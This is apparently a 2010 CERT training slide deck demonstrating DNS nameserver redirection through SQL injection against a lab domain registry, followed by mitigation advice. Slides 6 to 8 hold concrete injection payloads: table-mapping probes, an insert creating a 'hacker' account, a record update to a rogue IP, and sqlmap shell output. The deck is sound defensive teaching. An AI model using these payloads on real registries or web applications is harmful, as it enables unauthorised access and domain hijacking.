Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
DNS Security Attack Scenarios & Demonstrations
1. DNS Security for CERTs
- Attack Scenarios & Demonstrations –
NameServer Redirection
Chris Evans
Delta Risk, LLC
7 March 2010
1
2. What You Will Need for the Exercise
• Please Watch the Live Demonstration in Front
– We will be targeting the web registry system
• You may need your Ubuntu VM to:
– Prior to attack, verify the Web Registry System URL:
http://www.tld1 points to 192.168.101.50
– After attack, determine where http://www.tld1 points to
2
3. Description – NameServer Redirection
• Change of Registration or Delegation Data
– Intentional
• Disgruntled employee changes registry data
• Outsiders pretending to be a customer request an “update” to their
account
• Hackers change the registry database directly through web attacks
– Accidental
• Untrained employee
• Typos in registry data
Domain1 NS 1.1.1.1
Domain2 NS 2.2.2.2
Domain3 NS 3.3.3.3 -> 5.5.5.5
Attacker now controls
resolutions for Domain3
3
4. Case Study
• SQL Injection Top List of Data Breach Attacks
– SQL Injection used in 60% of all data breach attacks,
19% of all security breaches on the Internet
– Insecure programming techniques
combined with proliferation of web based
application = trouble
– Increase in automated techniques to detect
and exploit vulnerabilities = double trouble
DarkReading.com
4
5. Case Study
• Summer of 2009, several African & Pacific ccTLD
web-based registry systems were attacked through
SQL injection
– Attackers created new user accounts within the system
– These accounts were used to modify existing
registrations and re-delegate sites to malicious content
http://www.icann.org/en/security/sa-2009-0001.htm
5
6. Attack Demonstration
Your website is designed to perform a query during a
valid login attempt:
SELECT * FROM table WHERE username=‘mike’ AND password=‘!QAZ2wsx’
SQL Injection …. Well…. Injects SQL statements
into your backend database query:
New SQL statement
injected….
SELECT * FROM table WHERE username=‘mike‘; INSERT hacker INTO database
…original SQL
statement gets
commented out “--”
6
7. Demonstration – Attacker View
One single ‘ nets:
table name and two variables
' group by srs_users.username having 1=1--
Reconaisance & Table Mapping...
';insert into srs_users values(101,'hacker','password')--
Adds user hacker to the database…….
7
8. Demonstration – Attacker View (cont.)
Use SQL Injection tool to gain a shell to
the database <SQL-map>:
sql-shell> select * from srs_regs where fqdn='rogue.tld1'
do you want to retrieve the SQL statement output? [Y/n] y
[15:15:56] [INFO] fetching SQL SELECT statement query output: 'select * from srs_regs where
fqdn='rogue.tld1''
[15:15:56] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[15:15:56] [WARNING] on PostgreSQL it is only possible to enumerate on the current schema and on
system databases, sqlmap is going to use 'public' schema as database name
[15:15:56] [INFO] fetching columns for table 'srs_regs' on database 'public'
[15:15:56] [INFO] fetching number of columns for table 'srs_regs' on database 'public'
[15:15:56] [INFO] retrieved: 9
[15:15:57] [INFO] retrieved: regid
[15:15:59] [INFO] retrieved: type
[15:16:01] [INFO] retrieved: fqdn Enumerating
the Database…
[15:16:03] [INFO] retrieved: ns
[15:16:04] [INFO] retrieved: ip
[15:16:06] [INFO] retrieved: recordtype
[15:16:10] [INFO] retrieved: hostname
[15:16:14] [INFO] retrieved: ownerid
[15:16:17] [INFO] retrieved: parentid
…then update a
record with bad IP…
'; update srs_regs set (ip)=('192.168.85.5') where regid = 1 --
8
10. Demonstration – User View
; <<>> DiG 9.5.1-P2 <<>> www.tld1
1 ;; global options: printcmd One minute
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392 you get the
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL:
0 correct IP and
;; QUESTION SECTION: website…
;www.tld1. IN A
;; ANSWER SECTION:
www.tld1. 180 IN A 192.168.101.50
;; AUTHORITY SECTION:
; <<>> DiG 9.5.1-P2 <<>> www.tld1
2 ;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392
…the next ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL:
0
you’re browsing
;; QUESTION SECTION:
whatever the ;www.tld1. IN A
hacker wants ;; ANSWER SECTION:
www.tld1. 180 IN A 192.168.85.5
you to!
;; AUTHORITY SECTION:
10
11. Impact
• Registry suffers public relations hit, potential loss of
customers & revenue
• Loss of brand reputation, customers, or revenue for
registrants who are victimized
• Effect of attack persists even after detection and
mitigation because of TTLs
11
12. Mitigation & Response Strategies
• SQL Injection
– Practice secure coding principles in any web-based
application that has database connectivity
– Validate input and prevent “magic characters”
– Use an Web Application Firewall to filter/validate the
input to your web application
– Use database logging to track queries and the pages they
are being run on.
– Frequently audit your web applications (not just the
systems they run on!)
12
13. Mitigation & Response Strategies
• Nameserver Redirection
– Multi-factor authentication of changes
– Out-of-band check of changes (e.g. phone, in-person)
– Domain “locks” which prevent updates unless manually
approved
– Validation of changes before publishing new zone files
– Processes for contacting ISPs to “clear” cached entries
– Automated, continuous validation of published data with
automated alerting
– Also see ICANN SSAC Report SAC040
13
14. Mitigation & Response Strategies
• Information Sharing – if you’re the victim of an
attack – share the details of the attack within the
community – you may prevent someone else from
becoming a victim
A trusted entity, CERTs can encourage this type of
exchange within their communities
14